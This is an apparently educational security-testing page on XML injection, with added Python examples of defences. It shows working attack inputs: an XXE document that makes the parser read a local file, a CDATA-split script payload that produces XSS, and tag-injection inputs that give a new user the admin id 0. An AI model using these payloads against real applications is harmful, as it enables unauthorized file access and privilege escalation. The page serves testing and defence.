XML Injection – All things in moderation

XML Injection

  • Summary
    1. XML Injection testing is when a tester tries to inject an XML document into the application. If the XML parser fails to contextually validate data, then the test will yield a positive result.
    2. XML injection steps: first insert XML metacharacters to learn how the XML is processed and structured, then try to inject XML data and tags.
  • How to test
    • Discovery: when not sanitized, these characters could throw an exception during XML parsing
      • Single quote: '
        <node attrib='foo''/>
      • Double quote: "
        <node attrib="foo""/>
      • Angle brackets: > and <
        Username = foo<

        the application will build a new node

        <user>
             <username>foo<</username>
             <password>Un6R34kb!e</password>
             <userid>500</userid>
             <mail>[email protected]</mail>
        </user>
      • Comment tag: <!-- / -->
        Username = foo<!--

        the application will build a node like the following

        <user>
            <username>foo<!--</username>
            <password>Un6R34kb!e</password>
            <userid>500</userid>
            <mail>[email protected]</mail>
        </user>
      • Ampersand: & – it is used in the XML syntax to represent entities.
        For example:

        <tagnode>&lt;</tagnode>

        is valid, and represents the '<' ASCII character.
        If '&' is not itself encoded as &amp;, it could be used to test for XML injection.
        For example:

        Username = &foo

        a new node will be created:

        <user>
        <username>&foo</username>
        <password>Un6R34kb!e</password>
        <userid>500</userid>
        <mail>[email protected]</mail>
        </user>
      • CDATA section delimiters: <![CDATA[ / ]]>
        • A CDATA section defines a block of text that is not parsed by the parser but would otherwise be recognized as markup.
          For example, if there is the need to represent the string '<foo>' inside a text node, a CDATA section may be used:

          <node>
              <![CDATA[<foo>]]>
          </node>
        • CDATA rules:
          • A CDATA section cannot contain the string "]]>" anywhere in the XML document. The tester could try to inject the CDATA end string ']]>' to invalidate the XML document:
            <username><![CDATA[]]>]]></username>
        • Suppose that the XML is processed into an HTML page. In this case, the CDATA section delimiters may simply be eliminated:
          <html>
          $HTMLCode
          </html>

          An attacker can then provide the following input:

          $HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')
          <![CDATA[<]]>/script<![CDATA[>]]>

          Generating the HTML:

          <script>alert('XSS')</script>
    • Inject

      • External entity injection (XXE)

        • Definition (an XML document that makes the parser read a local file):
          <?xml version="1.0" encoding="ISO-8859-1"?>
          <!DOCTYPE foo [
            <!ELEMENT foo ANY >
            <!ENTITY xxe SYSTEM "file:///dev/random" >]>
          <foo>&xxe;</foo>
          
          • Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI. Configuration (PHP):

             bool libxml_disable_entity_loader ([ bool $disable = true ] )

          • This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to cause denial of service on the local system or to gain unauthorized access to files on the local machine.
          • Labs: bWAPP (XML injection)
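A Python counterpart, added here and not part of the article, to what the libxml configuration above achieves: instead of relying on a parser default (PHP deprecated libxml_disable_entity_loader() in 8.0 because libxml 2.9+ already refuses to load external entities), untrusted input is rejected outright if it carries any DOCTYPE, which also blocks internal-entity expansion bombs. XXE_DOC is the article's payload re-typed; BENIGN_DOC, DoctypeRejected and the function names are assumptions of this example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# The article's XXE document, re-typed as a constant (the SYSTEM URI is the
# one the article uses); BENIGN_DOC is a constructed well-formed document.
XXE_DOC = b'''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///dev/random" >]>
<foo>&xxe;</foo>'''
BENIGN_DOC = b"<foo>hello</foo>"


class DoctypeRejected(ValueError):
    """Raised when untrusted input carries a DOCTYPE declaration."""


def reject_doctype(data):
    """First expat pass that aborts on the DOCTYPE declaration itself, before
    any entity is declared, let alone resolved. Refusing every DOCTYPE (not
    only external entities) also stops internal-entity expansion attacks."""
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r not allowed in untrusted input" % name)
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # also raises ExpatError for malformed input


def parse_untrusted(data):
    """Gate first, then parse with the standard-library tree builder."""
    reject_doctype(data)
    return ET.fromstring(data)


def classify(data):
    """Outcome label for a document submitted by an untrusted client."""
    try:
        parse_untrusted(data)
    except DoctypeRejected:
        return "rejected: doctype"
    except (ET.ParseError, expat.ExpatError):
        return "rejected: malformed"
    return "accepted"


if __name__ == "__main__":
    print(classify(XXE_DOC))     # rejected: doctype
    print(classify(BENIGN_DOC))  # accepted
```

The gate parses the bytes twice; for request-sized documents that cost is negligible next to the alternative of letting the DTD reach the real parser.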
        • Tag injection:

          Once the discovery step has revealed some information about the structure of the XML document, it is possible to try to inject XML data and tags.
          Example:

          Username: tony
          Password: Un6R34kb!e
          E-mail: [email protected]</mail><userid>0</userid><mail>[email protected]
          

          The application will build a new node and append it to the XML database:

          <?xml version="1.0" encoding="ISO-8859-1"?>
          <users>
          	<user>
          		<username>gandalf</username>
          		<password>!c3</password>
          		<userid>0</userid>
          		<mail>[email protected]</mail>
          	</user>
          	<user>
          		<username>Stefan0</username>
          		<password>w1s3c</password>
          		<userid>500</userid>
          		<mail>[email protected]</mail>
          	</user>
          	<user>
          		<username>tony</username>
          		<password>Un6R34kb!e</password>
          		<userid>500</userid>
          		<mail>[email protected]</mail><userid>0</userid><mail>[email protected]</mail>
          	</user>
          </users>
          Note that the userid node is defined with cardinality 1 in the DTD below, so the injected document above contains two userid nodes and would fail validation.
          • DTD (document type definition) the document must satisfy:
            <!DOCTYPE users [
            	  <!ELEMENT users (user+) >
            	  <!ELEMENT user (username,password,userid,mail+) >
            	  <!ELEMENT username (#PCDATA) >
            	  <!ELEMENT password (#PCDATA) >
            	  <!ELEMENT userid (#PCDATA) >
            	  <!ELEMENT mail (#PCDATA) >
            ]>
            To keep the document valid, the original userid node is hidden inside a comment. Inject:
            Username: tony
            Password: Un6R34kb!e</password><!--
            E-mail: --><userid>0</userid><mail>[email protected]

            <?xml version="1.0" encoding="ISO-8859-1"?>
            <users>
            	<user>
            		<username>gandalf</username>
            		<password>!c3</password>
            		<userid>0</userid>
            		<mail>[email protected]</mail>
            	</user>
            	<user>
            		<username>Stefan0</username>
            		<password>w1s3c</password>
            		<userid>500</userid>
            		<mail>[email protected]</mail>
            	</user>
            	<user>
            		<username>tony</username>
            		<password>Un6R34kb!e</password><!--
            </password>
            		<userid>500</userid>
            		<mail>--><userid>0</userid><mail>
            [email protected]</mail>
            	</user>
            </users>
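The injection path of the two examples above (the plain tag injection and the comment variant that keeps the DTD satisfied), as an added Python example that is not part of the original article: an unsafe string-built <user> node next to an escaped one, a structural check equivalent to the DTD's user element, and the userid an application would actually read back. The payload dictionaries and e-mail addresses are constructed.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed inputs (not from the article): the two tag-injection payloads the
# article walks through, with placeholder e-mail addresses.
PLAIN_PAYLOAD = {"username": "tony", "password": "Un6R34kb!e",
                 "mail": "tony@example.test</mail><userid>0</userid>"
                         "<mail>attacker@example.test"}
COMMENT_PAYLOAD = {"username": "tony", "password": "Un6R34kb!e</password><!--",
                   "mail": "--><userid>0</userid><mail>attacker@example.test"}
ASSIGNED_USERID = "500"  # id the application assigns to every new user

TEMPLATE = ("<user><username>%s</username><password>%s</password>"
            "<userid>%s</userid><mail>%s</mail></user>")

def build_user_unsafe(fields, userid=ASSIGNED_USERID):
    """Plain string concatenation: field values are interpreted as markup."""
    return TEMPLATE % (fields["username"], fields["password"],
                       userid, fields["mail"])

def build_user_safe(fields, userid=ASSIGNED_USERID):
    """Same template, but &, < and > in every field are entity-encoded, so a
    value can never close the enclosing element or open a new one."""
    return TEMPLATE % (escape(fields["username"]), escape(fields["password"]),
                       userid, escape(fields["mail"]))

def child_tags(user_xml):
    """Element names of the <user> children in document order. The parser
    drops comments, exactly as the application's own parser would."""
    return [child.tag for child in ET.fromstring(user_xml)]

def matches_dtd(user_xml):
    """Structural check equivalent to
    <!ELEMENT user (username,password,userid,mail+)>."""
    tags = child_tags(user_xml)
    return (tags[:3] == ["username", "password", "userid"]
            and len(tags) > 3 and all(t == "mail" for t in tags[3:]))

def field_text(user_xml, name):
    """Text of the first <name> child, i.e. what find(name) hands back."""
    return ET.fromstring(user_xml).find(name).text

if __name__ == "__main__":
    for label, payload in (("plain", PLAIN_PAYLOAD), ("comment", COMMENT_PAYLOAD)):
        for build in (build_user_unsafe, build_user_safe):
            doc = build(payload)
            print(label, build.__name__, matches_dtd(doc), field_text(doc, "userid"))
```

The comment payload passes the DTD check yet yields userid 0 from the unsafe builder, which is why structural validation alone is not a fix; the escaped builder keeps the attacker's text as data and the assigned userid 500 in every case.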